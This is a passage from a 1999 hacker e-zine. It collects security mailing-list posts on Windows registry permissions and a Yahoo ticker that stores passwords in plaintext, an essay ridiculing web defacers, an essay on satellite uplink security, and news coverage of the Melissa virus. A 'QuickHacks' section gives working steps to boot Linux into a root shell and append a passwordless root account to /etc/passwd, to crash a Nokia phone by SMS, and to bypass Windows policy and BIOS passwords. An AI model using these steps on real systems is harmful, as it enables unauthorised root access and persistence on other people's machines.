CodeBaseSearchPath = <URL1>; <URL2>; ... <URLm>; CODEBASE;
<URLm+1>;
... <URLn-1>; <URLn>
In this format, each of URL1 through URLn is an absolute URL
pointing to HTTP servers acting as "object stores". When processing a
call to CoGetClassObjectFromURL, the Internet Component Download service
will
first try downloading the desired code from the locations URL1 through
URLm, then try the location specified in the szCodeURL parameter
(corresponding to the CODEBASE attribute in the <OBJECT> tag), and will
finally try the
locations specified in locations URLm+1 through URLn.
Note that if the CODEBASE keyword is not included in the key,
calls to CoGetClassObjectFromURL will never check the szCodeURL location for
downloading code. By removing the CODEBASE keyword from the key,
corporate intranet administrators can effectively disable Internet Component
Download for corporate users.

Thanks, Harry

-------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 14:57:51 -0500
From: Phil Brass <pbrass@ISS.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5 security vulnerabilities


> 4) The following information found on MSDN (search on
> CodeBaseSearchPath) addresses this concern: When Internet Component
> Download is called to download code, it traverses the Internet search path
> to
> look for the desired component. This path is a list of object store servers
> that will be queried every time components are downloaded using
> CoGetClassObjectFromURL. This way, even if an <OBJECT> tag in an HTML
> document does not specify a CODEBASE location to download code for an
> embedded OLE control, the Internet Component Download will still use the
> Internet search path to find the necessary code.
> Internet search path syntax
> The search path is specified in a string in the registry, under
> the key
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet
> Settings\CodeBaseSearchPath. The value for this key is a string in the
> following format:
> CodeBaseSearchPath = <URL1>; <URL2>; ... <URLm>; CODEBASE;
> <URLm+1>;
> ... <URLn-1>; <URLn>

On my NT4 SP3 box, permissions on this key are set to Everyone: Special
Access, which includes set
value. Therefore, anyone who is a user on this box can control where
every other user downloads
their controls from. Is that OK?

Phil


@HWA

07.0 QuickHacks and tips from ManicX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Quick Tricks

Now Just a few quick tips
( pulled all the other stuff, its for your own good :þ )
Stuff Covered - Linux, Mobiles, Windows, BIOS,


System: Nokia 5110

Crash it
Send an SMS message full of 160 full stops to the phone
It will now beep and flash for 30 sec's or else just turn itself off


System: Linux (with lilo installed and local access)

Gives a root shell / root account
reboot your machine on the lilo: prompt type in
what-linux-is-called-in-/etc/lilo.conf init=/bin/bash rw

(i.e. linux init=/bin/bash rw )

linux will now start to boot and stop after a few error message
you now have a root shell (you will have very few commands) so
type in the following

cat >> /etc/passwd
manicx::0:0:new root account:/root:/bin/bash
(hit crtl+d to get out of cat)

sync (just to bring your files up to date)

reboot and login with your new root account called manicx (no password)


System: Linux (with local access)

Gives a root shell / root account
Boot with the rescue.img available on most linux distro cd's
voila one root shell you will probably have to mount your linux
partition (hda5 is the partition might be hda2 > hda7)

mkdir /linux
mount /dev/hda5 /linux
cat >> /linux/etc/passwd
manicx::0:0:new root account:/root:/bin/bash
(hit crtl+d to get out of cat)

sync (just to bring your files up to date)

reboot and login with your new root account called manicx (no password)


System: Windows

Remove All policy restrictions

Open regedit
Scroll down to :
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies

Anything with a value of "1" is turned ON so double click on it
and change the value to "0" to turn it OFF
(Or if you cant be arsed just delete them, Its best to
note changes and change them back when your finished)

When your finished just exit you should now have access to the
all the restricted commands (run/dosprompt/control_panel/etc)

(Win98- You will probably have to reboot before the changes take effect)


System: Windows 95

Close down the start menu :þ
Double click the [Start] button, so its got a black dotted line
on it (this means its got focus) hit alt and - (minus key) at the
same time, voila you can now move or close the startmenu


System: Windows

Gets rid of BIOS password (and resets CMOS settings)
killcmos.zip
Or Pull out the cmos battery for 5-10 mins (you need to know the setup)


System: Windows

Get past any password protection before boot-up
Try booting from a floppy or holding down the shift key during startup


@HWA

08.0 NT4 index server 2.0 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 23 Mar 1999 23:40:55 -0000
From: Mnemonix <mnemonix@GLOBALNET.CO.UK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Index Server 2.0 and the Registry


When Microsoft's Index Server 2.0 is installed on NT 4 with
Internet Information Server 4 it opens a new "AllowedPath"
into the Windows NT Registry.

Administrators can control who can access the Windows NT
Registry via the network by editing permissions on the
Winreg key found under

HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg

By default, on NT Server 4, the permissions on this key are
set to Administrators with Full Control. No-one else should
have access (although it doesn't really work out like this in
the end.) There are certain paths through the Registry that
remote users, whether they are Administrators are not, may
access. These are listed in the AllowedPaths subkey found
under the Winreg key. These paths are to allow basic network
operations such as printing etc to continue as normal.

Index Server 2.0 creates a new "AllowedPath":

HKLM\System\CurrentControlset\Control\ContentIndex\Catalogs

meaning that anyone with an local or domain account for that
machine, including Guests, are able to discover the physical
path to directories being indexed or if a directory found in a
network share is being index they can learn the name of the
machine on which the share resides and the name of the user
account used to access that share on behalf of Index and
Internet Information Server. Permissions on the above key and
its sub-key give Everyone read access.

Note that regedit and regedt32 can not be used to access this
information. Tools such as reg.exe or home-baked efforts must
be used.

In most cases this issue represents a mild risk, but one worth
noting and resolving by removing if this adversely affects you
and your security policy.

Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix/


@HWA

09.0 Yahoo news ticker has plaintext passwords in config files...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FOR IMMEDIATE RELEASE:

Application: Yahoo! NEWS TICKER
Platforms : Win95,98,NT

Advisory:

The installation process of the Yahoo! NEWS TICKER
leaves a file name "install.log" in the program
directory. The file contains plaintext userid and
password.

The installation process also sets registry entries
under hkey_local_machine/software/netcontrols/ticker
that contain the plaintext userID and password.


Each yahoo account uses the same password/userid for
all parts including auctions, news, my.yahoo,
classifieds, and most importantly, EMAIL!!!!

this is an independant finding not a release by Yahoo!.

Advisory by CSB 24MARCH99

<end of transmission>

@HWA

10.0 Defacing websites? read this from bufferoverflow/attrition.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# mv index.new index.html
# echo "03.20.99"
# echo "I do not advocate web defacement or intrusive hacking."

Introduction
The Ends Justify The Means.
My Rant In Plain English.
Justification
Suggestions For Improving Your
Hacked
Pages.
The Good, The Bad, and The
Impressive.


Introduction

Browsing the web, enjoying your time, nothing better to do. Casual search
for something interesting to read, or maybe even a little research for a
project or term paper. Click here, click there, link from site to site.
Some mostly worthless, nothing more than links to other pages. Same old
thing, different day.. until today. You typed in the URL for a web page
that promised to have your info. Instead of computer pricing or biology,
you found a cryptic message scrawled out claiming something, hell if you
could tell what it was. You click on and forget about it.

Yes, that was a hacked web page. One of the favored things of crackers to
boast their deeds. Proof that they alone control the universe and 'own'
someone else's computers. Self reasoning and a shoddy moral vindication
of a petty break-in to some no name computer. At least, that sums up
almost 99% of current web defacement activities. Why?


The Ends Justify The Means.

Ok, lets buy that argument for now. The 'means' in our case is the hacking
of a site and the 'ends' constitutes replacement of the existing web page
with a new 'improved' page carrying the hacker's message. In today's
digital world, it is the equivalent of spray painting a wall to have your
message seen by passerbys. Stop here and think about all of the spraypaint
graffiti you have seen in the last six months. How much can you remember?
Odd isn't it. Some person took the time and effort to break the law in
order to get their message out. Risk possible incarceration for words or
ideas they felt were important, yet you can't remember any (or all) of
it. Why?

Simple answer. Because there was no real message worth reading. After
taking the power of free speech into their hands, after finding a place to
stand on a soapbox, the person stood up only to mumble to a handful of
faithful followers that already know the message. And boy, do they love to
hear you talk! The rest of the passerby's continue on, unconcerned. They
still don't know what you are trying to say. In fact, their opinion of you
has gone down because you took the time to get a soapbox, stand on it, and
face the public. You flaked out and didn't broadcast a meaningful message,
therefore you are worth no time or thought. And there you go, a passing
inattention in a fast moving world. Congrats.


My Rant in Plain English

In the past few years, over one thousand web pages have been hacked.
Their content has been replaced with whatever hasty rant has popped into
mind by the cracker. With few exceptions, arbitrary low traffic and no
name domains are 'chosen' by these crackers to put up their message. Some
of these sites get more traffic from the hack than a previous month of
regular visitors they are so low key.

The truth is, these kids(1) have delusions of grandeur in a networked
world that could give a second thought about them. Their message is
meaningless drivel that only impresses other kids for the most part. Web
viewers walk away from seeing their "message" thinking immature social
rejects plague the net, and they think so for damn good reasons.

More and more sites are being replaced by poorly designed pages, chock
full of mispelled words forming sentences that defy all rules of grammar.
Pages full of "elite speak"(2) that prove absolutely nothing, have no
humor value, and only contribute to more eye strain. Pages containing
poorly written rants that form incoherent thoughts, opinions or reasons as
to why the page was altered in the first place. Basically, dull pages that
show a complete lack of intelligence and no creativity whatsoever.

These kids have a chance to show the world that they are indeed
intelligent well balanced *mature* net users, yet they throw every chance
away it seems.

(1) I use the word kids because more times than not, they ARE
kids. Fifteen to Eighteen year olds that don't quite have
a concept of how things work. In the cases where they are
over eighteen, it is often difficult to tell based on the
content of the altered pages. Don't like the use of the
word 'kid'? Do a better job hacking these pages.
(2) Elite speak being the oh-so-old replacement of alternate
characters to spell words. t|-|1s TyP3 0f +3xt.


Justification

It seems most hackers want/need to justify their actions, be it to the
admin of the site they broke into, the people reading the pages, their
friends or often times themselves. Regardless of who they are trying to
vindicate themselves to, the reasoning falls apart every time.

Justification #1: "I'm doing you a favor.. this could have been a
malicious hacker that damaged your system!"
. Gee thanks for breaking in to
tell me that. It didn't occur to you that the other 80 MILLION internet
users did me a favor by not breaking in? Yet I should thank you? Although
these kids rarely do damage, they cause the administrator extra grief in
one form or another. Rather than normal work, they are forced into doing a
full security audit of their system or reinstalling from scratch. Yes,
maybe they should have been more concerned with security before this, but
it is a rare site that can dedicate that kind of time or resource to
staying up to date on the bleeding edge. That is the way the world works,
so deal with it. Oh, and don't try to use that as a justification.

Justification #2: "Because we can!" Ok, so if I shoot you in the
knee 'just because I can', does that teach you any real lesson? Amazingly
enough, this is about the only justification that holds any water. If
nothing else, it is the brutally honest truth that the person had nothing
better to do, and had no well grounded reason for their actions. Instead
of using this as a justification, why not think of a truly noble cause and
follow it?

Justification #3: "I was pointing out security holes on your site!"
Gee, thanks for the free security audit. Not. While you did indeed prove
there was a hole, did you mail the administrator telling him HOW you broke
in? How to fix it? Did you find more than one way into the system or just
the one? If you did none of that, you weren't even close to performing a
security audit. Oh, audits require permission too. Bad reason.

Justification #4: "Read my political reasons yo!" This one almost
works for me, but like the others has serious shortcomings. If your true
reason is to impress upon your readers of some political or moral agenda,
did you really do it? A good job of it? Did you sit down and research your
topic, finding resources and legitimate sources of information to leak to?
Did you write up a political rant and place it on an appropriate system?
Did you spell check your work to make sure that it flowed reasonably well?
Doubtful. Putting up third grade level rants on www.unrelated.com mean
just about nothing and truly fail as a justification. Try again.


Suggestions For Improving Your Hacked Pages.

I am not one to complain about a problem without offering some solution or
input to offset the bitching. However, with this comes the chance people
will blame me for encouraging hacking and continued defacement of web
pages. I do NOT condone any such thing! I am practical and realize
that nothing I say will stop people from doing it. That in mind, I am just
trying to make the best out of an existing situation. That said... here
are my top 10 suggestions for future hacked pages.

1. Better designed pages! Hackers and crackers are said to be
creative. You sure wouldn't know it looking at many of these
pages. Take your time and DESIGN the web page you are putting
up. Make it aesthetically appealing to both lynx and graphical
browsers. Why do companies spend all the time on beautiful
pages in the first place?

2. Better messages! You are cracking these machines and
replacing pages to "get your message out". Err, ok, what is your
message? Remember that people are visiting with no prior
knowledge of you, your message, or your cause. Be clear and
concise and spell out your message for them.

3. No more elite speak crap. If you want to impress people
with alternate characters, offer the hacked page in several
languages. I for one would love to know what some of the hacked
pages in Mexico say, and I would also bet that foreign hackers
would love to read American hacks in their tongue. Surely you know
someone who can translate to German, French, Latin, Russian
or more impressive, Japanese. :)

4. You want to use 'elite' speak? Try grammar, spelling, and
puncuation. A well written paragraph will command more respect
than any substitute character will. If you mispell common
words, how can anyone take you serious? Do you find yourself
falling behind in English classes? Use the net to help you!
You may find online resources like a dictionary or thesauras
an invaluable tool.

5. Help the site! After all, you embarassed them and caused
them some kind of hassle. After breaking in and changing their web
page, why not temporarily patch the hole/bug in the system
that gave you access? Better, patch it and tell what you exploited
to get in on the web page. Let other admins learn that these
holes are actively being exploited. Link to information on more
permanent solutions to their security problem. That is at least
half way noble.

6. Back up the main page for them! Rather than overwriting
their index.html and relying on them to have a copy, just rename
the old one. From your new page, link to the old one and give
customers a chance to reach the information they were looking
for. They had to read your message to get to it, your job is
done.

7. Show knowledge of computers! Creating your hacked web pages
with editors like 'FrontPage Express' isn't exactly condusive
to propagating the myth that hackers know the system. If you
can't write out a basic web page in a simple editor like 'vi',
'pico', or 'DOS edit', you should probably learn HTML before
worrying about other people's systems.

8. Target your hacks! Don't change the page of any arbitrary
domain you happen to stumble across. Pick a system you feel
that needs a face lift and apply it to that system only.

9. Don't actually carry out the mass hack! If you find
yours in the position of being able to change pages on multiple
domains, don't. Just pick the highest traffic domain, or biggest
name and change that one. On your hacked page link to a list of
other domains that could have been affected.

10. Choosing a name! Try to be mature when choosing a name.
Everyone realizes that some names are quite humorous, but remember
who reads these pages. Making a profound statement and backing
it by "tHe SiNgAlOnG gAnG!@$#$@" just isn't very cool.


The Good, The Bad, and The Impressive.

The good, the bad, and the impressive.

In the past, there have been pages (more like *elements* of pages) that
have stood out as creative, amusing, or to the point. Hopefully by
pointing out these examples you will begin to see what I have been
attempting to convey.

The Good

Humor: While it probably wasn't the best site to hit, the recent
hack of Greenpeace
had a certain dark (and sick) sense of humor behind it.

Interesting: Another new person/group to hit the scene recently is
'Redemption'. Their hacks to date have simply contained
(apparent) original poetry. A sign of creativity at last!
You can read their work from hacks like DaytonTech,
Town Green, and TC Edge.

Targeted: As suggested above, targeting specific domains in order to
spread a specific message is a good thing. Examples of this
can be found in
Monica Lewinksy's
Future Site, White Pride, and Ku Klux Klan.

Political: Probably the most memorable and well done hacks was that of
the 'Human Rights China' site. When hacking for political
agendas, hit the right site, with the right message, and
present a well written argument. Does wonders. Don't believe
me? Check out the www.humanrights-china.org
hack.

The Bad

Bad: Amnesty International found themselves victim of a web
page defacement. Of all the sites on the net, why hit
groups that are trying to do good already? Isn't that
somewhat defeating?

Pathetic: The various hacks for a short period of time carried out
by 'zyklon' of LoU. These hacks (many movie home pages)
turned out to be one or two lines of broken english followed
by a dedication to his girlfriend. *yawn* Kiddies with
no creativity.

Pathetic: The recent mass hack by the 'Miss Piggy Hackclub', which
caused over one hundred domains to display a single line:
"The Miss Piggy Hackclub Strikes again muthafuqErz!$##$!@"
*yawn* That is almost worth reading.

The Impressive

None! There hasn't been a truly impressive web page defacement to come
along. None that took the cake in site, message, and design. :(


by whoever (whoever@attrition.org)
(c)opyright 1999 - This piece protected by U.S. copyright and may not
be copied without the express written permission of
'whoever@attrition.org'
or representing parties of said address. Permission is granted to repost
this work in full on any *non-profit* site or mail list.

Disclaimer: I do not advocate web defacement. Don't do it. Go learn to
program or be creative in better capacities.

-EOF


@HWA

11.0 Security analysis of Satellite command uplinks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Analysis of Satellite
Command and Control Uplinks

By Brian Oblivion, L0pht Heavy Industries
mailto:oblivion@l0pht.com


With every passing day we are becoming aware of the
fragile link between technology and modern society. Many
critical information paths flow over satellites orbiting our
earth. A box floating in space seems to be a likely target
for hacker groups or renegade nation-states. As
sensational as such a satellite takeover would be, it is
highly unlikely. These satellites cost millions of dollars, and
an adequate sum of money is devoted to make sure it
remains under the control of the intended parties.

This document attempts to perform an analysis of security
methods used by Government/Military Ground Stations.
This information is a summation and review of open-source
non-classified information taken from the Internet and
other printed sources. Most information is from NASA
operations proceedures, however, references from those
proceedures influence/are influenced by military SATCOM
standard operating proceedures.

There are two methods of compromising a satellite by an
external threat vector.* One is an attack directly on the
Satellite by a rogue Ground Station. The second is an
attack on the Master Ground Station (MGS), which houses
the command and control (C&C) Uplink, and various
access control equipment. An outside attacker may not
have all the resourses necessary to attack the C&C uplink
such as the eqiupment that encodes the commands and
the transmission to the spacecraft. This driving factor
makes the assult on the MGS all the more appealing.

A great deal of work has been put into securing the C&C
Uplink. The spacecraft command processor authenticates
every command sent to it. The C&C data is often
encrypted and decrypted in the spacecraft. The downlink
is often unencrypted, however, in the military arena, this
is often encrypted as well. Various transmission modes
can be used but in the military/government arena spread
spectrum (SS) or frequency hopping (FH) is generally
employed using secure spreading or hopping sequences.
SS and FH are used due to thier anti-jamming and low
probability of intercept characteristics.

In the unlikely event a rogue Ground Station actually
acquired the sequence to get a command burst to the
satellite, the MGS would begin to receive telemetry
indicating that a command channel is being accessed.
Responses from the satellite to the rogue Ground Station
would be received at both locations. The MGS would see a
response to a request it did not send and a flag would be
raised at which point contingency plans would be set in
motion. It would also be very difficult for a rogue Ground
Station to supply the proper command sequence field,
unless the MGS is being monitored. Highly unlikely in the
case of the armchair hacker, point and clicking his way to
telecommunications Godhood.

By far the path of least resistance is obtaining control
through compromising the security of the MGS. While long
term control may not be achievable, there is the
possibility of spoofing a command message to the uplink
operators and having them pass that information to the
satellite. Scientific Exploration and commercial satellites
usually conform to the CCSDS telecommand frames and
the military/government uses something similar.
Information on these command frames and command
syntax are available through the Internet.

A set of checks and balances exist within the MGS. If a
command request exceeds pre-defined parameters, the
command is flagged and escalated to an authority to
determine the nature of the exception. Interception,
modification, and re-submission of a command message is
of the greatest risk. However, the attacker would require
an indepth knowledge of the target system and have
knowledge of the normal operational parameters so
exceptions would not be flagged, reveling his presence.
Once a command is determined valid by the spacecraft
command processor, the command is sent back to verify
the proper command was indeed received and awaits
acknoledgement. Further analysis of the command
processor and actual checks performed on the sequence
and syntax of commands received are beyond the scope
of this document.

Due to these checks, one command sending the satellite
spiraling out of orbit is just not possible without the
addition of catestrophic equipment failure. Remember that
satellite position is also tracked by third parties. In the
event that a satellite makes a change in course, the MGS
of that satellite would be immediately notified. There are
other checks in place that monitor the heartbeat of a
satellite. Should that satellite move, its associated beam
spot would become disturbed resulting in loss or
degredation of communications.

There are overrides to the normal safeguards for
emergency spacecraft commanding. As long as an override
provision exists, there is the possibility of the exploitation
of that provision. However, the override can only be
engaged by onsite MGS personel. Manual overrides are a
requirement for every MGS. In the event that the
computerized frontend is compromised in some fashion, be
it of malicious intent or equipment failure, commands can
be relayed to the spacecraft directly from manual
command consoles.

The nature of Satellite communications often dictates
that Ground Stations are not necessarily located in the
most convient locations. Quite often they are located in
remote regions and/or at sea. This requires a distributed
networking architecture as well as interoper- ability
definitions. NASA in particular has been moving from its
highly proprietary legacy systems to more
commercial-off-the shelf (COTS) hardware. One must
realize this obscurity once provided additional security to
the network. The current trend in commercial security
offerings is a reactionary role to security management.
Holes remain to be identified until the units are shipped to
the end user and often not found until the device is in
operation.

Some MGS's are known to be connected to live
internetworked nets. These nets are often treated as
sensitive, yet unclasified, to support interoperability.
Security policy governing the nature of the systems which
are hosted by the satellites define the security of the
MGS network. Where interoperablity is not an issue,
without physical access to the MGS, your chances are
remote to compromise the system.

Institutional security policy sets directives in employing
firewalls and restrictive routers. Intrusion detection
system may also be employed between closed networks.
SecurID, kerberos, and biometric access controls are
found throughout the commercial/government/military
access controls. Access is usually restricted by IP
address. Firewalls and routers have been known to be
accidentially misconfigured, and often remain that way for
lenghty periods of time due to inadequate penetration
testing and security fault analysis. An offline
proof-of-concept security prototyping lab is a requirement
for integrating a new access control system into the
operational environment. A good institutional security
policy will require such facilities.

Many safeguards have been built into the existing C&C
uplinks. Key management systems are classified, as is

      information on implementation of cryptographic systems 
used. There may be holes in the implementation, but with
the other safeguards, the chances of successfuly
undermining the o security mechanisms is slim. One can
never under estimate the human factor in these systems.
To poke holes in security policy is human.

Hopefully this article shed light onto the criteria which
may lead to MGS compromise and direct satellite C&C
uplink attack. The chances of something along these lines
actually happening without new techniques or heretofore
unknown methods being employed, is remote, but not
impossible.

----------------------------------------------------

* A third attack vector could be an attack from within.
Poisoning the flight software on the satellite, or the
software used to interact with the satellite, bypassing
required security provisions.

Code review could diminish this threat.


@HWA


12.0 Melissa virus makes it hard for Microsoft users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Bad Girl Melissa Overloads Networks


Contributed by Adam
IT Managers around the world will wake up Monday
morning to overloaded email servers as a new MS Word
Macro Virus/Worm spreads across the internet. "Melissa"
attacks users of MS Outlook by grabbing up to fifty
addresses from an Outlook address book and
automatically sends copies of itself as an MS Word
attachment to unsuspecting victims. While the
virus/worm does not seem to intentionally cause
damage the flood of email that it generates is enough to
bog down servers essentially causing a major denial of
service. Users who do not use Microsoft products will
not be effected.

Forbes.........http://www.forbes.com/tool/html/99/mar/0326/side1.htm
ZD Net.........http://www.zdnet.com/zdnn/stories/news/0,4586,2233030,00.html
Info World.....http://www.infoworld.com/cgi-bin/displayStory.pl?990326.wcvirus.htm
NY Times.......http://www.nytimes.com/library/tech/99/03/biztech/articles/28virus.html
C | Net........http://www.news.com/News/Item/0,4,34334,00.html?st.ne.fd.gif.e
Nando Times....http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html


The Forbes and Nando Times stories follow;


From Forbes
http://www.forbes.com/tool/html/99/mar/0326/side1.htm

Porn virus hits
Corporate America

By Adam L. Penenberg with Elizabeth Corcoran

number of companies--including Microsoft,
Compaq, Intel and Boeing--have been infected by
a new computer virus that attacks users of the
Microsoft Outlook E-mail program. The virus,
dubbed "Melissa," was first cataloged today, March 26,
by MacAfee on its web site.

The virus is spreading rapidly and, because of its design
is jamming E-mail gateways and causing system
administrators to shut down. Since the virus was
uncorked just before the weekend, when IT staff are
away from work, the full extent of the damage may not
be known for some time, although it is certain that
many more companies--and individuals--will fall victim.

If you are listed in someone's Outlook Express address
book, and he is infected, then you could be affected--if
you open the attached MSWord file.

"Getting rid of this will take a long time, because it only
takes one message to start it all over again," says Barry
Wadman, president of C-Systems, an E-commerce
designer. "I venture to say that this will be affecting
and or infecting the net for at least a couple of weeks."

Intel, according to PR manager Tom Waldrop, has
ordered those who have received the virus to shut
down their machines. "The IT staff is working hard to
make sure that infected machines are cleaned
appropriately," he says.


"It is certain that many more
companies will fall victim."


Melissa is a Word Macro Virus that is spread when a
user opens an attached Microsoft Word file. Upon
activation, it looks for Outlook--Microsoft's E-mail,
newsreader and personal information manager--creates
a message, and sends it to the first 50 people listed in
the user's address book. Each message contains the
subject: "Important Message From (Your User Name)."
The body of the E-mail simply says, "Here is that
document you asked for ... don't show anyone else ;-)"

When users click on the attached file, they unleash the
virus. The attached file contains a list of 300 porno
sites--passed on as if the sender is pointing people to
XXX porno sites. It also modifies the normal template in
MS Word, infecting every new document that the user
creates with Word.

The virus is not malevolent, meaning it does not destroy
or alter data, or trash hard drives. But it is fiendish
because of the intense volume of E-mail it produces,
which is causing networks to choke. Only users of
Microsoft Outlook are affected by the Melissa virus.
Macintosh users and those using other E-mail programs
have nothing to worry about.

"In the past people have always been told not to open
attachments that come from people you do not know,"
says Space Rogue, publisher of Hacker News Network
and a member of L0pht Heavy Industries, a
Boston-based hacker think tank. "Well, here is a virus
that is sent as an attachment from someone you do
know."

The Melissa virus seems to be one of the few with a
utiltarian purpose. Since the virus spreads so quickly, it
"would definitely be a great spam vehicle," says Dildog,
another member of Lopht.

Most spam points recipients at porn sites and
get-rich-quick scams. That typical spam is easily traced
back to its source, since the spammer usually includes a
web site, phone number or E-mail address. But the
Melissa virus, by automatically spewing out a list of 300
sites, makes tracing the creator extremely difficult.

Comments inside the virus include:

'WORD/Melissa written by Kwyjibo

'Works in both Word 2000 and Word 97

'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!

'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

The best way to stop the virus? Be suspicious of mail
with attachments and the subject line: "Important
Message From (Your User Name)"


From Nando Times;
http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html

'Melissa' virus hits Internet

Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service

By DICK SATRAN

SAN FRANCISCO (March 28, 1999 4:34 p.m. EST http://www.nandotimes.com)
- A virus that spreads via e-mail hit computers over the weekend and
threatened havoc Monday as workers return to offices and begin opening
messages sent over the Internet.

The virus, called "Melissa," comes in the form of a document that lists
pornography sites on the World Wide Web.

Computer experts said the virus was aimed at widely used Microsoft
Windows-based e-mail address book software, Outlook and Outlook
Express, and it can send up to 50 additional versions of the e-mail to
other users, threatening a widespread infection of computer systems.

That could create a flood of unwanted e-mails around the Internet as the
program perpetuates itself using pre-programmed "macros," software
embedded in the Windows operating system that sets off complex computer
functions with one command.

"It could grow explosively and shut down e-mail systems as a side effect,"
Eric Allman, co-founder of the Emeryville, Calif.-based Sendmail, a
widely used provider of e-mail services, said in an interview Sunday.

A number of leading software security firms and academic experts posted
warnings about the e-mail threat, including Network Associates, the
leading anti-virus software maker.

"Melissa is widely reported and spreading quickly via mass e-mail, a
function of the viral infection," said Network Associates based in Santa
Clara, Calif.

Carnegie Mellon University's Software Engineering Institute issued an
advisory, which said, "The number and variety of reports we have received
indicate that this is a widespread attack affecting a variety of sites."

The only damage the virus causes is that it replicates itself and creates
a flood of e-mail, though it apparently does not hurt the computer itself,
experts said.

The real danger is that the virus will overwhelm the server computers that
handle computer messaging systems, which could lead to system shutdowns as
each e-mail multiplies itself 50 times. Already, a wave of the e-mails has
been sent out and awaits office workers Monday morning.

"It's not doing malicious things or removing files or anything like that,"
Allman said. "I've heard claims that it has been doing more but I haven't
seen any substantial verification of that. It's really more of a wake-up call,
that shows us how you could take a malicious virulent virus and
reproduce it all over the place very quickly."

Computer experts warned users to be wary of documents sent from any senders
asking them to open up a file for Microsoft Word. That file, in turn, asks for
a prompt asking users whether they want to initiate a "macro," and requires
users to approve its use. Those checkoffs make it
relatively easy to avoid the problem.

Microsoft itself has simply warned users to "be careful about what runs on their
machine," the New York Times reported. Carnegie Mellon said,
"our analysis indicates that human action (in the form of a user opening an
infected Word document) is required for this virus to activate."

The virus can be identified, Network Associates said, because it will read
"Important Message From Application.UserName." The body of the text reads "Here
is that document you asked for ... don't show anyone else" and contains a list of
pornographic Web sites.

Melissa creates the following entry in the registry:
HKEYCURRENTUSER/Software/Microsoft/Office/"Melissa?"

Network Security said that to avoid the risk of contracting the Melissa virus,
"it is recommended that network administrators and users upgrade their anti-virus
software to include detection and cleaning for W97M/Melissa."

Network Security posted information about the virus on its the Web site of its
Avert Labs division, Sendmail also posted advice on the Melissa problem at
http:/www.sendmail.com and Carnegie Mellon posted information on its Web site as
well.

Computer experts said that if advisories were followed, the problem would probably
not become a widespread worry.

"I suspect we'll see a day or two of extremely high e-mail loads and then it will
just die out, so in some sense this virus is not that critical but it's one what
demonstrates what could happen if a truly malicious virus were released," Sendmail's
Allman said. "The ability to spread something so
broadly is scary."


FBI, experts search for elusive author of 'Melissa' virus

March 30, 1999
Web posted at: 10:47 p.m. EST (0347 GMT)
http://www.cnn.com/TECH/computing/9903/30/virus.tracker/index.html


WASHINGTON (CNN) -- Several mutations of the computer virus
known as Melissa surfaced Tuesday, although experts said they were not as
effective as the original in clogging e-mail systems.

The FBI has launched an investigation into the fast-spreading virus, which
first appeared last Friday and spread rapidly around the world by Monday.

The agency estimated that the virus has affected "thousands of computer
users" at more than 100 companies and government agencies.

"I urge e-mail users to exercise caution when reading their e-mail for the next
few days and to bring unusual messages to the attention of their system
administrator," said Michael A, Vatis, director of the FBI's National
Infrastructure Protection Center (NIPC).

NIPC is a multiagency unit focusing on threats to the nation's infrastructure,
including computers and telephone, electric and water systems.

The Melissa virus spreads via Microsoft's widely used Word 97 and Word
2000 documents which can be attached to e-mail messages.

The Melissa virus comes in the form of e-mail, usually containing the subject
line "Important Message." It appears to be from a friend or colleague.

The body of the e-mail message says, "Here is that document you asked for
... don't show it to anyone else" with a winking smiley face formed by the
punctuation marks ;-).

Attached to the message is a Microsoft's Word document file that lists
Internet pornography sites. Once the user opens that file, the virus digs into
the user's Microsoft's Outlook address book and sends infected documents
to the first 50 addresses.

Computer sleuth tracks down virus source

As the virus swamped one computer system after another over the
weekend, software developer Richard Smith followed a trail of electronic
fingerprints left by Melissa.

"This electronic fingerprint is basically the serial number of your computer.
So what I was curious about is whether it would be possible to use the serial
number in the Melissa document ... to track down the author," said Smith,
who runs Phar Lap Software, a small Cambridge, Massachusetts, software
firm that makes operating systems and software tools.

Smith posted his "digital fingerprinting" theory on an Internet discussion
group Friday. He received an e-mail from a college student in Sweden who
pointed out similarities between Melissa and older viruses written by a
computer user known as "VicodinES."

Smith was familiar with other work attributed to the notorious VicodinES,
named after the painkiller drug Vicoden. The same user had posted
so-called "virus creation tool kits" on the Web.

"In about 30 percent of those files, I found that same fingerprint number, the
same serial number that was in the Melissa virus ... at a minimum, we know
that the Melissa virus and these tool kits were created on the same
computer," Smith said.

Threat remains

Smith said he turned his findings over to the FBI, who regard the
transmission of the virus as a criminal matter.

But the biggest impact of the Melissa virus appeared to be the temporary
shutdown of massive computer systems by cautious managers.

Computer giants Microsoft and Intel were among those who received copies
of the tainted note, as did Lucent Technologies, the world's largest
communications equipment maker.

And although anti-virus software programs have so far been successful in
containing Melissa, experts fear its variants will be corrected and distributed
by copycat virus writers.

Indeed, a potentially more damaging virus code-named "Papa" emerged on
Monday. The new virus is a more elaborate program that uses the same
e-mail system as Melissa.

Correspondent Marsha Walton, The Associated Press and Reuters contributed to this
report.


@HWA


12.1 The Melissa macro virus code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
